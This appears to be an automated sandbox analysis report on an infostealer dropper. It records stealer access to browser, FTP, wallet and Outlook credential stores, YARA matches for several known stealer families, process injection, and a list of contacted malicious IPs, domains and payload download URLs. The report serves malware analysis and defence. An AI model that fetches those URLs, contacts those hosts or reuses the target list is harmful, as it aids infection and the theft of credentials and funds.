Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Yara detected Credential Stealer
Source: Yara match File source: 00000011.00000002.2614020316.00000000014EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2717483187.00000000027D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2717483187.00000000028F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected PureLog Stealer
Source: Yara match File source: 25.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2138074138.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2027068709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 14.2.2Umx78uafM0WA03fzJyYYhBa.exe.43e5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.2Umx78uafM0WA03fzJyYYhBa.exe.43e5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2120842089.00000000043E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2717483187.00000000027D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2589310760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2Umx78uafM0WA03fzJyYYhBa.exe PID: 8072, type: MEMORYSTR
Yara detected Socks5Systemz
Source: Yara match File source: 00000027.00000002.3002403298.0000000002C91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.3002271535.0000000002BEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000011.00000002.2614020316.00000000014EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2308704967.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 23.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.7wpHB_IZvVwIDf0EgO_TfPH6.exe.32b5570.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.7wpHB_IZvVwIDf0EgO_TfPH6.exe.32b5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2753591127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7wpHB_IZvVwIDf0EgO_TfPH6.exe PID: 8048, type: MEMORYSTR
Yara detected zgRAT
Source: Yara match File source: 25.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.raw.unpack, type: UNPACKEDPE
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E1307A sqlite3_transfer_bindings, 17_2_61E1307A
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D5E6 sqlite3_bind_int64, 17_2_61E2D5E6
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D595 sqlite3_bind_double, 17_2_61E2D595
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E0B431 sqlite3_clear_bindings, 17_2_61E0B431
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E037F3 sqlite3_value_frombind, 17_2_61E037F3
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D781 sqlite3_bind_zeroblob64, 17_2_61E2D781
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D714 sqlite3_bind_zeroblob, 17_2_61E2D714
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D68C sqlite3_bind_pointer, 17_2_61E2D68C
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D65B sqlite3_bind_null, 17_2_61E2D65B
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D635 sqlite3_bind_int, 17_2_61E2D635
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D9B0 sqlite3_bind_value, 17_2_61E2D9B0
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D981 sqlite3_bind_text16, 17_2_61E2D981
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D945 sqlite3_bind_text64, 17_2_61E2D945
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D916 sqlite3_bind_text, 17_2_61E2D916
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D8E7 sqlite3_bind_blob64, 17_2_61E2D8E7
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E038CA sqlite3_bind_parameter_count, 17_2_61E038CA
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E158CA sqlite3_bind_parameter_index, 17_2_61E158CA
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E038DC sqlite3_bind_parameter_name, 17_2_61E038DC
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D8B8 sqlite3_bind_blob, 17_2_61E2D8B8
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1505384 Sample: gobEmOm5sr.exe Startdate: 06/09/2024 Architecture: WINDOWS Score: 100 120 traineiwnqo.shop 2->120 122 t.me 2->122 124 9 other IPs or domains 2->124 190 Multi AV Scanner detection for domain / URL 2->190 192 Suricata IDS alerts for network traffic 2->192 194 Found malware configuration 2->194 196 21 other signatures 2->196 11 gobEmOm5sr.exe 5 2->11         started        15 jewkkwnf.exe 2->15         started        17 svchost.exe 2->17         started        19 2 other processes 2->19 signatures3 process4 dnsIp5 100 C:\Users\user\AppData\...\gobEmOm5sr.exe.log, ASCII 11->100 dropped 210 Writes to foreign memory regions 11->210 212 Allocates memory in foreign processes 11->212 214 Injects a PE file into a foreign processes 11->214 22 RegAsm.exe 37 11->22         started        26 RegAsm.exe 11->26         started        216 Multi AV Scanner detection for dropped file 15->216 29 WerFault.exe 17->29         started        31 WerFault.exe 17->31         started        126 127.0.0.1 unknown unknown 19->126 file6 signatures7 process8 dnsIp9 134 185.143.223.148, 49730, 80 INFORMTECH-ASRU Russian Federation 22->134 136 176.111.174.109, 49738, 49742, 80 WILWAWPL Russian Federation 22->136 138 9 other IPs or domains 22->138 92 C:\Users\...\yh8OwfLgsaGOEy8sLU5UpJIK.exe, PE32 22->92 dropped 94 C:\Users\...\wvASxpczH5zLyfxXnILhiH8_.exe, PE32+ 22->94 dropped 96 C:\Users\...\lenTsqDIajevXTuJaJ03oKGb.exe, PE32 22->96 dropped 98 20 other malicious files 22->98 dropped 33 QUh1lM2wAJwuyCkYckhrDFwz.exe 2 22->33         started        36 PsIhedmEA44FNRssEU8V9OlH.exe 2 22->36         started        39 lenTsqDIajevXTuJaJ03oKGb.exe 22->39         started        44 9 other processes 22->44 202 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 26->202 204 Drops PE files to the document folder of the user 26->204 206 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 26->206 208 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 26->208 42 Conhost.exe 29->42         started        file10 signatures11 process12 dnsIp13 168 Writes to foreign memory regions 33->168 170 Allocates memory in foreign processes 33->170 172 Injects a PE file into a foreign processes 33->172 46 RegAsm.exe 33->46         started        51 conhost.exe 33->51         started        53 RegAsm.exe 33->53         started        55 RegAsm.exe 33->55         started        82 C:\Users\...\PsIhedmEA44FNRssEU8V9OlH.tmp, PE32 36->82 dropped 57 PsIhedmEA44FNRssEU8V9OlH.tmp 36->57         started        140 185.215.113.100 WHOLESALECONNECTIONSNL Portugal 39->140 84 C:\Users\user\AppData\...\mozglue[1].dll, PE32 39->84 dropped 86 C:\Users\user\AppData\...\freebl3[2].dll, PE32 39->86 dropped 174 Detected unpacking (changes PE section rights) 39->174 176 Tries to detect sandboxes and other dynamic analysis tools (window names) 39->176 178 Tries to steal Mail credentials (via file / registry access) 39->178 186 7 other signatures 39->186 88 C:\ProgramData\...\etzpikspwykg.exe, PE32+ 44->88 dropped 180 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 44->180 182 Contains functionality to inject code into remote processes 44->182 184 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 44->184 188 3 other signatures 44->188 59 RegAsm.exe 44->59         started        61 REaoHTwA9AqN_cDvubi9mxZt.exe 44->61         started        63 RegAsm.exe 44->63         started        65 9 other processes 44->65 file14 signatures15 process16 dnsIp17 142 46.8.231.109 FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics Russian Federation 46->142 102 C:\Users\user\AppData\Local\...\vjgg[1].exe, PE32 46->102 dropped 114 15 other files (11 malicious) 46->114 dropped 156 Tries to steal Mail credentials (via file / registry access) 46->156 158 Tries to harvest and steal ftp login credentials 46->158 160 Tries to harvest and steal browser information (history, passwords, etc) 46->160 162 Tries to harvest and steal Bitcoin Wallet information 46->162 104 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 57->104 dropped 106 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 57->106 dropped 108 C:\Users\user\AppData\...\unins000.exe (copy), PE32 57->108 dropped 116 9 other files (8 malicious) 57->116 dropped 67 newstar.exe 57->67         started        144 194.163.35.141 NEXINTO-DE Germany 59->144 146 147.45.47.36 FREE-NET-ASFREEnetEU Russian Federation 59->146 110 C:\Users\user\AppData\Local\...\filename.exe, PE32 59->110 dropped 164 Installs new ROOT certificates 59->164 166 Tries to steal Crypto Currency Wallets 59->166 148 77.105.164.24 ICOMF-ASRU Russian Federation 61->148 112 C:\Users\user\AppData\...\PowerExpertNNT.exe, PE32 61->112 dropped 118 2 other malicious files 61->118 dropped 72 schtasks.exe 61->72         started        74 schtasks.exe 61->74         started        150 t.me 149.154.167.99 TELEGRAMRU United Kingdom 63->150 152 147.45.126.10 FREE-NET-ASFREEnetEU Russian Federation 63->152 154 2 other IPs or domains 65->154 76 conhost.exe 65->76         started        file18 signatures19 process20 dnsIp21 128 185.196.8.214 SIMPLECARRER2IT Switzerland 67->128 130 89.105.201.183 NOVOSERVE-ASNL Netherlands 67->130 132 141.98.234.31 CH-NET-ASRO Russian Federation 67->132 90 C:\...\DB Light Pack Engine 9.6.45.exe, PE32 67->90 dropped 198 Detected unpacking (changes PE section rights) 67->198 200 Detected unpacking (overwrites its own PE header) 67->200 78 conhost.exe 72->78         started        80 conhost.exe 74->80         started        file22 signatures23 process24
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
46.8.231.109
 unknown Russian Federation
28917 FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics true
185.215.113.100
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
176.113.115.33
 unknown Russian Federation
49505 SELECTELRU false
147.45.44.104
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU false
194.163.35.141
 unknown Germany
6659 NEXINTO-DE true
104.26.2.46
 iplogger.org United States
13335 CLOUDFLARENETUS false
46.29.235.52
 unknown Russian Federation
34804 EUROTELECOM-ASRU false
31.41.244.9
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false
185.196.8.214
 unknown Switzerland
34888 SIMPLECARRER2IT true
149.154.167.99
 t.me United Kingdom
62041 TELEGRAMRU true
147.45.126.10
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
173.231.16.77
 api64.ipify.org United States
18450 WEBNXUS false
77.105.164.24
 unknown Russian Federation
43176 ICOMF-ASRU true
147.45.47.36
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
104.21.10.172
 condedqpwqm.shop United States
13335 CLOUDFLARENETUS true
76.76.21.142
 file-link-iota.vercel.app United States
16509 AMAZON-02US false
34.117.59.81
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
176.111.174.109
 unknown Russian Federation
201305 WILWAWPL false
158.69.225.124
 youtransfer.net Canada
16276 OVHFR false
141.98.234.31
 unknown Russian Federation
41011 CH-NET-ASRO false
188.114.96.3
 stamppreewntnq.shop European Union
13335 CLOUDFLARENETUS true
185.143.223.148
 unknown Russian Federation
204718 INFORMTECH-ASRU true
89.105.201.183
 unknown Netherlands
24875 NOVOSERVE-ASNL false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
youtransfer.net 158.69.225.124 true
ipinfo.io 34.117.59.81 true
t.me 149.154.167.99 true
file-link-iota.vercel.app 76.76.21.142 true
iplogger.org 104.26.2.46 true
stamppreewntnq.shop 188.114.96.3 true
condedqpwqm.shop 104.21.10.172 true
api64.ipify.org 173.231.16.77 true
240902180529931.tyr.zont16.com unknown unknown
locatedblsoqp.shop unknown unknown
traineiwnqo.shop unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://46.8.231.109/c4754d4f680ead72.php true
    http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll true
      147.45.47.36:30035 true
        http://147.45.44.104/revada/66c6fcb30b9dd_123p.exe false
          https://t.me/edm0d true
            http://147.45.126.10/sql.dll true
              http://46.29.235.52/vjgg.exe false
                http://185.215.113.100/ true
                  http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll true
                    http://185.215.113.100/0d60be0de163924d/sqlite3.dll true
                      http://46.29.235.52/vjgg.exe#space false
                        http://46.29.235.52/sgnr.exe#space false
                          https://iplogger.org/1nhuM4.js false
                            https://youtransfer.net/handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5fcca567315ff7c87e27582&url=https%253A%252F%252Fyoutransfer.net%252FuuVCUDm6%252Fcb726802f5fcca567315ff7c87e27582 false
                              https://steamcommunity.com/profiles/76561199768374681 true
                                http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll true
                                  locatedblsoqp.shop true
                                    https://file-link-iota.vercel.app/download true
                                      caffegclasiqwp.shop true
                                        millyscroqwp.shop true
                                          http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll true
                                            http://147.45.44.104/revada/66d98aa7bea3e_newPrime.exe#real false
                                              traineiwnqo.shop true
                                                condedqpwqm.shop true
                                                  https://api64.ipify.org/?format=json false